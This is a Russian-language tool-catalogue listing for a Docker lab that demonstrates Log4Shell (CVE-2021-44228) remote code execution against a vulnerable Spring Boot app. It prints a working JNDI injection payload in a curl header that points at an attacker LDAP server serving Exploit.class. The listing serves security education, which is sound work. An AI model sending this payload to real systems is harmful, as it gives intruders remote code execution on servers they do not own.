Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228_Log4Shell — Демонстрация эксплуатации RCE на основе Docker для Log4Shell (CVE-2021-44228) с уязвимым приложением Spring Boot, вредоносным LDAP-сервером и доставкой полезной нагрузки через JNDI-инъекцию. | Kitploit
Инструменты/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Демонстрация эксплуатации RCE на основе Docker для Log4Shell (CVE-2021-44228) с уязвимым приложением Spring Boot, вредоносным LDAP-сервером и доставкой полезной нагрузки через JNDI-инъекцию.

Репозиторий
54 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Демонстрация эксплуатации уязвимости Log4Shell (CVE-2021-44228)

Этот проект моделирует сценарий атаки RCE через уязвимость Log4Shell в библиотеке Apache Log4j 2.

Компоненты

  1. vulnerable-app: Приложение Spring Boot, использующее Log4j 2.14.1.
  2. attacker: Содержит вредоносный LDAP-сервер (marshalsec) и HTTP-сервер, обслуживающий вредоносный файл Exploit.class.

Выполнение

1. Запуск окружения

Требуется установка Docker и Docker Compose.

docker compose up --build

Дождитесь готовности обоих контейнеров. vulnerable-app будет запущен на порту 8080.

2. Выполнение атаки

Откройте новый терминал и отправьте запрос с payload JNDI через заголовок X-Api-Version:

curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. Проверка результатов

  • Проверьте логи контейнера vulnerable-app. Вы увидите сообщение о том, что payload был записан в лог.
  • Проверьте логи контейнера attacker. Вы увидите, что LDAP-соединение перенаправляется на HTTP-сервер.
  • Проверка RCE: Проверьте, был ли создан файл /tmp/pwned внутри контейнера vulnerable-app:
docker exec -it vulnerable-app ls -la /tmp/pwned

Если файл существует, это означает, что вредоносный код Exploit.class был успешно выполнен!

Предупреждение

Этот проект предназначен только для образовательных целей и исследований в области безопасности. Категорически запрещается использовать его в незаконных целях.

Скачать инструмент